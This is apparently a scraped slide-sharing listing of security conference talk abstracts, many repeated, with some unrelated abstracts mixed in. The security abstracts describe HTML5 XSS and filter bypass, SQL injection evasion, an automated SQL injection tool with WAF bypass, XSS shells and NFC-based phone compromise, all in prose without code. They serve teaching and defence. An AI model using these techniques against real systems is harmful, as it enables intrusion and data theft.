The document discusses attacking websites using HTML5 features and capabilities. It introduces HTML5 and some of its new tags, attributes, and APIs that can be abused for attacks like cross-site scripting and bypassing input filters. Specific techniques demonstrated include bypassing blacklists using new HTML5 event attributes and tags, setting up reverse web shells using cross-origin requests, and clickjacking via the drag-and-drop API. The talk also covers poisoning the HTML5 application cache and exploiting client-side file includes through cross-origin XMLHttpRequests. Demo attacks are promised to illustrate these HTML5-based vulnerabilities.
The objective of this talk is to demonstrate how to subvert some SQLi (bad but popular) defenses and to show how to properly defend against SQLi attacks.
We will cover topics such as:
- Blind SQLi attacks
- Timing SQLi attacks
- Encoding attacks
- How to subvert some filters
- How you should protect your code against SQLi attacks
Presented at Confraria Security & IT, 26/01/11 Lisbon
note: this is exactly the same talk as given in Codebits IV (2010), without the Codebits CTF qualifier explanation.
This talk was co-presented by me and Nuno Loureiro (http://www.slideshare.net/nuno.loureiro)
In this talk I will present a brief introduction to Code Review, where we will try to understand its value and why it is so hard to implement effectively. I will also present some of the challenges we had at SAPO and how we tried to fix them.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP Zap to create valuable dynamic security tests. In those slide, I'm showing how we added those test to one of our open source project - Tweek (https://github.com/soluto/tweek)
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Christian Schneider
Diese Session zeigt Ihnen, welche Automatisierungsoptionen zur Überwachung bestimmter Sicherheitsaspekte in der agilen Softwareentwicklung bestehen. Ausgehend von dem etablierten DevOps-Konzept, mit dem im Übergang von Entwicklung zu Betrieb Prozesse automatisiert und verzahnt werden, wird mit „Security-DevOps“ dieser Antrieb aufgegriffen und auf die Absicherung von Anwendungen gegen Hackerangriffe übertragen. Durch frühe Rückkopplung sicherheitstechnischer Findings an die Entwicklung im Rahmen der Automatisierung haben Ihre Pentester die Möglichkeit, sich auf die kniffligeren Sicherheitschecks zu konzentrieren – trotz geforderter kurzer Releasezyklen.
Attacking and Defending Mobile ApplicationsJerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetuated, as well as how we can develop to defend against them.
The objective of this talk is to demonstrate how to subvert some SQLi (bad but popular) defenses and to show how to properly defend against SQLi attacks.
We will cover topics such as:
- Blind SQLi attacks
- Timing SQLi attacks
- Encoding attacks
- How to subvert some filters
- How you should protect your code against SQLi attacks
Presented at Confraria Security & IT, 26/01/11 Lisbon
note: this is exactly the same talk as given in Codebits IV (2010), without the Codebits CTF qualifier explanation.
This talk was co-presented by me and Nuno Loureiro (http://www.slideshare.net/nuno.loureiro)
In this talk I will present a brief introduction to Code Review, where we will try to understand its value and why it is so hard to implement effectively. I will also present some of the challenges we had at SAPO and how we tried to fix them.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP Zap to create valuable dynamic security tests. In those slide, I'm showing how we added those test to one of our open source project - Tweek (https://github.com/soluto/tweek)
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Christian Schneider
Diese Session zeigt Ihnen, welche Automatisierungsoptionen zur Überwachung bestimmter Sicherheitsaspekte in der agilen Softwareentwicklung bestehen. Ausgehend von dem etablierten DevOps-Konzept, mit dem im Übergang von Entwicklung zu Betrieb Prozesse automatisiert und verzahnt werden, wird mit „Security-DevOps“ dieser Antrieb aufgegriffen und auf die Absicherung von Anwendungen gegen Hackerangriffe übertragen. Durch frühe Rückkopplung sicherheitstechnischer Findings an die Entwicklung im Rahmen der Automatisierung haben Ihre Pentester die Möglichkeit, sich auf die kniffligeren Sicherheitschecks zu konzentrieren – trotz geforderter kurzer Releasezyklen.
Attacking and Defending Mobile ApplicationsJerod Brennen
The rapid increase in mobile technology adoption in the workplace has resulted in a rise in mobile application attacks. This presentation provides attendees with insight into how mobile application attacks are perpetuated, as well as how we can develop to defend against them.
Sanoop Thomas & Samandeep Singh
Burp suite is the de-facto proxy application for web security testers. This hands-on workshop will explore the different capabilities of burp proxy application, also dive into the extensions and tooling options to perform improved application security test cases.
The workshop will start with a quick overview of burp usage, different settings, features, some commonly useful extensions and then explore deep into its extension APIs to build your own custom extensions. We will provide a suitable development environment in Java and Python platforms. This will be a hands-on workshop and participants will learn how to automate different application security test scenarios and build burp extensions with the help of templates.
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015Christian Schneider
Diese Session zeigt Ihnen, welche Automatisierungsoptionen zur Überwachung bestimmter Sicherheitsaspekte in der agilen Softwareentwicklung bestehen. Ausgehend von dem etablierten DevOps-Konzept, mit dem im Übergang von Entwicklung zu Betrieb Prozesse automatisiert und verzahnt werden, wird mit "Security-DevOps" dieser Antrieb aufgegriffen und auf die Absicherung von Anwendungen gegen Hackerangriffe übertragen.
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Christian Schneider
In this session I will present best practices of how open source tools (used in the DevOps and security communities) can be properly chained together to form a framework that can - as part of an agile software development CI chain - perform automated checking of certain security aspects. This does not remove the requirement for manual pentests, but tries to automate early security feedback to developers. Ultimately the aim is to free pentesters’ time by continuously reducing the amount of
recurring (easy to find) default findings, so that pentesters can use
that time to focus on the really high-hanging fruits.
Based on my experience of applying SecDevOps techniques to projects, I will present the glue steps required on every commit and at nightly builds to achieve different levels of depth in automated security testing during the CI workflow.
I will conclude with a "SecDevOps Maturity Model" of different stages of automated security testing and present concrete examples of how to achieve each stage with open source security tools.
Projects Valhalla and Loom at IT Tage 2021Vadym Kazulkin
In this presentation, we will explain the motivation, added values, challenges and current status of the Valhalla and Loom projects.
In the Valhalla project, Inline Type is introduced in Java. Inline Type is an immutable type that differs only by the state of its properties. The purpose is to reduce memory consumption and access times for such data types. Also as a part of this project Java type system will be unified so that Java will become a pure object-oriented programming language.
In the Loom project, lightweight threads are implemented in Java. The purpose is to no longer trade off between simplicity and scalability of the source code and to reconcile both.
This presentation explains how to perform security testing using ZAP in Salesforce .Learn how to Install and configure ZAP to Automate Security Testing !!
Slides form my talk - Essential security measures in ASP.NET MVC . More info on - https://hryniewski.net/essential-security-measures-in-asp-net-mvc-resources-for-talk/
How can you authenticate without authentication? Is there another way to perform authentication?
Those are the slides for a talk I gave at OWASP AppSec Israel.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
So you have deployed your web app to Azure. Now, how do you make it more secure and compliant?
In this fast-paced talk we will run through an overview of some of the Azure technologies that you can use to better protect your web applications in Azure - all depending on your required security level, of course. The talk will set out a framework for you to consider which protections you want to put in place and provide you with the awareness of the tools at your disposal.
https://www.lytzen.name/talks/Securing_web_apps_in_azure.html
Sanoop Thomas & Samandeep Singh
Burp suite is the de-facto proxy application for web security testers. This hands-on workshop will explore the different capabilities of burp proxy application, also dive into the extensions and tooling options to perform improved application security test cases.
The workshop will start with a quick overview of burp usage, different settings, features, some commonly useful extensions and then explore deep into its extension APIs to build your own custom extensions. We will provide a suitable development environment in Java and Python platforms. This will be a hands-on workshop and participants will learn how to automate different application security test scenarios and build burp extensions with the help of templates.
Security DevOps: Wie Sie in agilen Projekten trotzdem sicher bleiben // JAX 2015Christian Schneider
Diese Session zeigt Ihnen, welche Automatisierungsoptionen zur Überwachung bestimmter Sicherheitsaspekte in der agilen Softwareentwicklung bestehen. Ausgehend von dem etablierten DevOps-Konzept, mit dem im Übergang von Entwicklung zu Betrieb Prozesse automatisiert und verzahnt werden, wird mit "Security-DevOps" dieser Antrieb aufgegriffen und auf die Absicherung von Anwendungen gegen Hackerangriffe übertragen.
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...Christian Schneider
In this session I will present best practices of how open source tools (used in the DevOps and security communities) can be properly chained together to form a framework that can - as part of an agile software development CI chain - perform automated checking of certain security aspects. This does not remove the requirement for manual pentests, but tries to automate early security feedback to developers. Ultimately the aim is to free pentesters’ time by continuously reducing the amount of
recurring (easy to find) default findings, so that pentesters can use
that time to focus on the really high-hanging fruits.
Based on my experience of applying SecDevOps techniques to projects, I will present the glue steps required on every commit and at nightly builds to achieve different levels of depth in automated security testing during the CI workflow.
I will conclude with a "SecDevOps Maturity Model" of different stages of automated security testing and present concrete examples of how to achieve each stage with open source security tools.
Projects Valhalla and Loom at IT Tage 2021Vadym Kazulkin
In this presentation, we will explain the motivation, added values, challenges and current status of the Valhalla and Loom projects.
In the Valhalla project, Inline Type is introduced in Java. Inline Type is an immutable type that differs only by the state of its properties. The purpose is to reduce memory consumption and access times for such data types. Also as a part of this project Java type system will be unified so that Java will become a pure object-oriented programming language.
In the Loom project, lightweight threads are implemented in Java. The purpose is to no longer trade off between simplicity and scalability of the source code and to reconcile both.
This presentation explains how to perform security testing using ZAP in Salesforce .Learn how to Install and configure ZAP to Automate Security Testing !!
Slides form my talk - Essential security measures in ASP.NET MVC . More info on - https://hryniewski.net/essential-security-measures-in-asp-net-mvc-resources-for-talk/
How can you authenticate without authentication? Is there another way to perform authentication?
Those are the slides for a talk I gave at OWASP AppSec Israel.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
So you have deployed your web app to Azure. Now, how do you make it more secure and compliant?
In this fast-paced talk we will run through an overview of some of the Azure technologies that you can use to better protect your web applications in Azure - all depending on your required security level, of course. The talk will set out a framework for you to consider which protections you want to put in place and provide you with the awareness of the tools at your disposal.
https://www.lytzen.name/talks/Securing_web_apps_in_azure.html
Oltersdorf Realty Home Buying Presentation, Leelanau, Grand Traverse, Travers...Oltersdorf Realty, LLC
Please take a moment to browse our detailed guide for homebuyers geared especially towards first time home buyers in the Traverse City region (Leelanau and Grand Traverse County). The combination of decreased home values, low interest rates, and federal incentives make this a very attractive time to purchase your first home or to be a move up buyer. Topics covered include: The current Traverse City real estate market, the buying process, buy vs. rent, tax incentives, home buyer credit, finding an agent, securing a loan, and protecting your investment. Please visit http://www.oltersdorf.com for additional information!
Snapshots taken from the internet to underscore the need to give to your favourite charitable institution to help the Haitian people. They need your help
E você está esperando o quê para fazer parte de nossa equipe ?
Entre no site e veja o projeto que estamos desenvolvendo e não perca tempo se cadastre hoje mesmo.
http://diamantenobre.com.br/eternyon/grupoeternyontop/
Estou Jogando para empresas do mercado brasileiro de gamesCayo Medeiros
Apresentação do Estou Jogando para as empresas que atuam no mercado brasileiro de games ou que tem interesse nesse mercado.
Se você é uma empresa do mercado brasileiro de games e está querendo ir direto ao ponto ou está com pressa, pule para o slide 20!
Данный проект полезен, так как он нацелен на:
активизацию исследовательских навыков обучающихся и формирование у них информационной культуры;
развитие способности к моделированию ситуаций;
приобретение опыта ведения диалога, дискуссий;
приобщение к творческой деятельности;
повышение интереса к предмету.
HTML5 introduces significant changes for today\'s websites: new and updated tags, new functionality, better error handling and improved Document Object Model (DOM). However, the HTML5 new features come with new (application) security vulnerabilities. This presentation reviews the new attack vectors, associated risks and what a needs to be taken into consideration when implementing HTML5.
Top 10 HTML5 Features for Oracle Cloud DevelopersBrian Huff
Whether you are using Mobile, Social, Java, or Sites in the cloud, HTML5 is probably the easiest way to create and maintain web applications. Most of the Oracle cloud supports HTML5, so it is important to understand what powerful new features are built into this platform.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
Browser exploitation| Reporting vulnerability in top browsers and finding CVE.
Session in Null Bangalore Meet 23 November 2019 Null/OWASP/G4H combined meetup
Thanks to respective researchers for their work.
Summarising Snowden and Snowden as internal threatClubHack
A quick lookback at snowden's revelation and also lookign at snowden as an insider threat
*This presentation end abruptly because during the talk it ends as food for thought and kickstart of next session*
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
What is FatCat Sql injector: This is an automatic SQL Injection tool called as FatCat.
Fatcat Purpose? : For testing your web application and exploit your application into more deeper.
FatCat Support:
1)Mysql 5.0
FatCat Features?
Union Based Sql Injection
Error Based Sql Injection
MOD Security Bypass (WAF)
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
The paper shall focus on the following:
The paper shall focus on the following:
1) Introduction to the problem: Focus on “security awareness”, not “behavior”
2) Real life case study of why a US$100, 000 “security awareness” project failed
a. Identifying the human component in information security risks
b. Addressing the human component using “awareness” and “behavior”
strategies
4) Sample real-life case studies where quantifiable change has been observed
Original research and Publications
The talk is modeled on the methodology HIMIS (Human Impact Management for Information
Security) authored by Anup Narayanan and published under “Creative Commons,
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
NFC or the Near Field Communication allows cell phones to perform specified actions whenever they detect NFC tags or signals from other NFC enabled device. Most of the recent phones including Samsung Galaxy S3, Nokia Lumia 610, Blackberry Bold etc have NFC enabled with them. NFC even helps enterprise/payment gateways to ease up users actions, such as connecting to a wifi, setting a bookmark, making payments etc.
Gone are the days of sending Android malware links through URL or attachments. In this talk, we will be showing how an attacker could steal the private and sensitive information from one’s phone and even perform malicious actions on user’s phone, using NFC as an attack vector. NFC attack vectors come in two forms : Active(setting attacker’s phone as a proxy between victim’s smartphone and the payment terminal) and Passive(using NFC tags).For our demonstrations, we would be creating malicious NFC tags which when detected by any smartphone(NFC enabled) would steal sensitive informations from the phones (without the users knowledge) as well as trick user to install malicious applications to his phone. Thereafter, we would also be talking about how an attacker could get in close proximity of another NFC-enabled phone, get a remote shell on the victim’s phone and compromise the phone’s security. We would also be discussing how viral an NFC attack could go in future, if proper security measures are not enforced.
Smart grids is an added communication capabilities and intelligence to traditional grids,smart grids are enabled by Intelligent sensors and actuators, Extended data management system,Expanded two way communication between utility operation system facilities and customers,Network security ,National integration ,Self healing and adaptive –Improve distribution and transmission system operation,Allow customers freedom to purchase power based on dynamic pricing ,Improved quality of power-less wastage ,Integration of large variety of generation options.
We have seen the more complex and critical infrastructure the more vulnerable they are. From the Year of 1994 we have seen lots of incidents where SmartGrid were Hacked the latest and booming incident was Stuxnet Worm which targeted Nuclear Power System of Iran and Worldwide.There are different types of Attacks we will see. Security needed for Smart Grid.
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
This presentation highlights the key legal risks and their implications in cloud computing. Cloud is inherently multi-jurisdictional, encompassing, remote hosting and processing of the data. This gives rise to multiple legal issues including security and privacy of the data, IP Rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remains the biggest concern for the companies. Businesses should look at issues ranging from physical location of the data centers, protection of the data against any adversity and intrusion, and access rights management.
The cloud servers are often located in different countries, which results in trans- border Data Flow. Each country has its own set of legal rules and regulations regarding data protection and privacy policies and the same can bring in complications in form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to the contract in the clouds. Interoperability of the data in the event of termination of services of a vendor is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy HiremathClubHack
With the development of technology, the interdependence of various infrastructures has increased, which also enhanced their vulnerabilities. The National Information Infrastructure security concerns the nation’s stability and economic security. So far, the research in Internet security primarily focused on securing the information rather than securing the infrastructure itself.
The pervasive and ubiquitous nature of the Internet coupled with growing concerns about cyber attacks we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop Hardware redesign architectures, Algorithms, and Protocols to realize a dependable Internet infrastructure. In order to achieve this goal, the first and foremost step is to develop a comprehensive understanding of the security threats and existing solutions. These attempts to fulfil this important step by providing classification of Security attacks are classified into four main categories: DNS hacking, Routing table poisoning, Packet mistreatment, and Denial-of-Service attacks. We are generally discussing on the existing Infrastructure solutions for each of these categories, and also outline a methodology for developing secured Nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
Today there is a flood of tools to help with the automation of active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces down to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameters guessing are seldom performed by even skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex encoded in to a very inconsequential looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of times checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool that is designed for hybrid analysis. It performs automated passive analysis of a web application with no input from the user for some cases and with specific application specific input for some other cases. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
Hacking and Securing iOS Applications by Satish BomissttyClubHack
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.
The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh BelgiClubHack
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
With the increased in security awareness it’s very difficult to compromise the network/workstation, as most of network administrator put very restrictive firewalll policy for incoming network traffic i.e. allow only traffic for http/https service and antivirus software can easily detect any virus/worm infected file. This talk is about content type attack that cannot be blocked at network perimeter/firewall and undetectable by antivirus. The discussion also includes demonstration of attack vector to compromise the system. At last it includes analysis of malicious file used to compromise the system.
Abstract of the paper;Cross site scripting (XSS) attacks are considered one of the most dangerous attacks. When an application accepts un-validated user inputs and sends it back to the browser without validation, it provides attackers with an opportunity to execute malicious scripts in victim users’ browsers. By using this attack vector, malicious users can hijack user accounts, deface websites, carry out phishing attacks etc .XSS shell is a cross domain tool to carry out XSS attack in more controlled manner. It is used to setup a channel between attacker and victim’s browser and controlling the victim’s browser.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and would continue doing so it in the coming future too. We enjoy making this for you all.It is said that “A lot can happen over a cup of coffee”. We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine and it now it has come all this way… :). 2 years looks small when we look back.For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress therefore we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue we have Network Security in Tool Gyan which will put light on how to set up a secured network, Who wants to be a Millionaire in Tool Gyan, check out yourself of what exactly its all about ;)TOR in Mom's guide for all those who thought 'It sounds very complicated to use, I’m not a hacker! I can’t use it!' by our Author- Federico from Italy.
From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with we have an article on PHP based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and Matriux section.
Do send us your feedback on abhijeet@chmag.in this will help us improve further.
We are now in mid of 2012. As predicted by many techno geeks, this year is phenomenal for IT related technologies including security, networking and web technologies. In April cloud war is started between two big rivals Microsoft & Google. Both making sure that its going to be secure and useful for smart phone users as well. With introduction of new such technologies we must ensure security over the web. Here HTTPS comes into picture and we brought this topic in CHMag's Mom's guide. Along with it topics like Steganography(Tech Gyan), a new toolkit - Kautilya(Tool Gyan), preventing SQL injections(Code Gyan) are covered.
If you have good write up and topic that you think people should know about it then please share with CHMag. Also if you have suggestions, feedback & articles, send it on info@chmag.in. Keep reading!!
There was a time when mobile phones were of the size of a shoe and had no features other than calling and sms and at that time I used to play the game - Snake on my dads phone :p Now as the time has passed we have reached the age of smart phones which are capable of doing lot of stuff and world wide web of application causing serious concern where an attacker can use this platform to steal data. This issue of CHMag is dedicated Mobile/Telecom Hacking and Security.
The coverpage of this December issue was released at ClubHack 2011, India’s Pioneer International Hacking Conference held last week. Talking about ClubHack Conference, if you missed ClubHack here are the presentations available at - http://www.slideshare.net/clubhack and videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collectors Editions (vol1 – from issue 1 to 10 & vol2- from issue 11 to 20), please write back to us: info@chmag.in. As of now its on demand printing.
Like the game - Snake, I have played lots of other games too which have reflected in the previous coverpages I have designed and yes I promise another awesome coverpage based on a game on the theme of android security which would be the theme for an upcoming issue, for which send in your articles to info@chmag.in
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
